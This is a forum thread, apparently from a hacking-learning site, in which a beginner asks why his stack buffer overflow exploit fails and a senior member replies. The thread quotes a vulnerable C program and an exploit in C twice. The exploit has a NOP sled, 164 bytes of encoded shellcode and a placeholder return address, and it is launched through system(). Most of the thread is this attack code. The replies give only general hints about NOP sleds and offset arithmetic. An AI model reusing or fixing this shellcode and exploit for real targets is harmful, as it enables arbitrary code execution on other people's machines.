Results 1 to 4 of 4

Thread: Buffer Overflow don't work

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default Buffer Overflow don't work

    Hi,
    ( first sorry for my bad english, be patient i'm a beginer, and tkx a lot for your help)

    I have read a tutorial
    and the vulnerable program was


    Code:
    #include
    #include
    
    int Aelphaeis();
    
    int main(int argc, char **argv)
    {
    char buffer[256];
    strcpy(buffer, argv[1]);
    printf("%s", buffer);
    return 0;
    }
    
    int Aelphaeis()
    {
    printf("ub3r secret c0de\n");
    return 0;
    }

    so i saw that the buffer was 256 Char but when I created my little exploit
    my computer give an overflow error @ 268 bytes

    my shell code is 164 bytes

    268 - 164 => 104 bytes ( or NOP )

    i have written this exploit

    Code:
    #include
    #include
    
    int main()
    {
    int x=0;
    unsigned char exploit[400]="vuln.exe ";
    unsigned char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    unsigned char scode[]="\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2a\x7a\x5f\x35\x83\xeb\xfc\xe2\xf4\xd6\x92\x1b\x35\x2a\x7a\xd4\x70\x16\xf1\x23\x30\x52\x7b\xb0\xbe\x65\x62\xd4\x6a\x0a\x7b\xb4\x7c\xa1\x4e\xd4\x34\xc4\x4b\x9f\xac\x86\xfe\x9f\x41\x2d\xbb\x95\x38\x2b\xb8\xb4\xc1\x11\x2e\x7b\x31\x5f\x9f\xd4\x6a\x0e\x7b\xb4\x53\xa1\x76\x14\xbe\x75\x66\x5e\xde\xa1\x66\xd4\x34\xc1\xf3\x03\x11\x2e\xb9\x6e\xf5\x4e\xf1\x1f\x05\xaf\xba\x27\x39\xa1\x3a\x53\xbe\x5a\x66\xf2\xbe\x42\x72\xb4\x3c\xa1\xfa\xef\x35\x2a\x7a\xd4\x5d\x16\x25\x6e\xc3\x4a\x2c\xd6\xcd\xa9\xba\x24\x65\x42\x8a\xd5\x31\x75\x12\xc7\xcb\xa0\x74\x08\xca\xcd\x19\x3e\x59\x49\x54\x3a\x4d\x4f\x7a\x5f\x35";
    unsigned char retour[]="\x04\x03\x02\x01";
    printf("etape 1");
    strcat(exploit,nop);
    printf("\netape 2");
    strcat(exploit,scode);
    printf("\netape 3");
    strcat(exploit,retour);
    printf("\netape 4\n");
    x=strlen(exploit);
    printf("etape 5\n");
    printf("%d\n",x);
    system(exploit);
    printf("\nexploit ok\n");
    system("PAUSE");
    }

    but it don't work

    and i haven't the solution can you help me please

    tks

  2. #2
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by Noktec View Post
    Hi,
    ( first sorry for my bad english, be patient i'm a beginer, and tkx a lot for your help)

    I have read a tutorial
    and the vulnerable program was


    Code:
    #include
    #include
     
    int Aelphaeis();
     
    int main(int argc, char **argv)
    {
    char buffer[256];
    strcpy(buffer, argv[1]);
    printf("%s", buffer);
    return 0;
    }
     
    int Aelphaeis()
    {
    printf("ub3r secret c0de\n");
    return 0;
    }

    so i saw that the buffer was 256 Char but when I created my little exploit
    my computer give an overflow error @ 268 bytes

    my shell code is 164 bytes

    268 - 164 => 104 bytes ( or NOP )

    i have written this exploit

    Code:
    #include
    #include
     
    int main()
    {
    int x=0;
    unsigned char exploit[400]="vuln.exe ";
    unsigned char nop[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    unsigned char scode[]="\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2a\x7a\x5f\x35\x83\xeb\xfc\xe2\xf4\xd6\x92\x1b\x35\x2a\x7a\xd4\x70\x16\xf1\x23\x30\x52\x7b\xb0\xbe\x65\x62\xd4\x6a\x0a\x7b\xb4\x7c\xa1\x4e\xd4\x34\xc4\x4b\x9f\xac\x86\xfe\x9f\x41\x2d\xbb\x95\x38\x2b\xb8\xb4\xc1\x11\x2e\x7b\x31\x5f\x9f\xd4\x6a\x0e\x7b\xb4\x53\xa1\x76\x14\xbe\x75\x66\x5e\xde\xa1\x66\xd4\x34\xc1\xf3\x03\x11\x2e\xb9\x6e\xf5\x4e\xf1\x1f\x05\xaf\xba\x27\x39\xa1\x3a\x53\xbe\x5a\x66\xf2\xbe\x42\x72\xb4\x3c\xa1\xfa\xef\x35\x2a\x7a\xd4\x5d\x16\x25\x6e\xc3\x4a\x2c\xd6\xcd\xa9\xba\x24\x65\x42\x8a\xd5\x31\x75\x12\xc7\xcb\xa0\x74\x08\xca\xcd\x19\x3e\x59\x49\x54\x3a\x4d\x4f\x7a\x5f\x35";
    unsigned char retour[]="\x04\x03\x02\x01";
    printf("etape 1");
    strcat(exploit,nop);
    printf("\netape 2");
    strcat(exploit,scode);
    printf("\netape 3");
    strcat(exploit,retour);
    printf("\netape 4\n");
    x=strlen(exploit);
    printf("etape 5\n");
    printf("%d\n",x);
    system(exploit);
    printf("\nexploit ok\n");
    system("PAUSE");
    }

    but it don't work

    and i haven't the solution can you help me please

    tks
    NOPs aren't used simply to fill the buffer space, they are used to "slide" the execution to a specific point in memory. Do some more research into how BoFs work, read Jon Erickson's Hacking: The Art Of Exploitation, and then you'll have a better grasp on what's going on......



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  3. #3
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    8

    Default

    yes i know that but my exploit does not work

  4. #4
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by Noktec View Post
    yes i know that but my exploit does not work
    And it doesn't work because you don't understand it and can't do simple math. I'd love to help you but you need to help yourself first....

    Take a look at your numbers again. Look at your buffer, figure your return address according to buffer size - (NOP+shellcode), which brings up the question of why the hell is your shellcode so large, and go from there.

    Like I said before, read up on BoFs, then compare what that information is telling you and what you did. You'll see where you went wrong....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •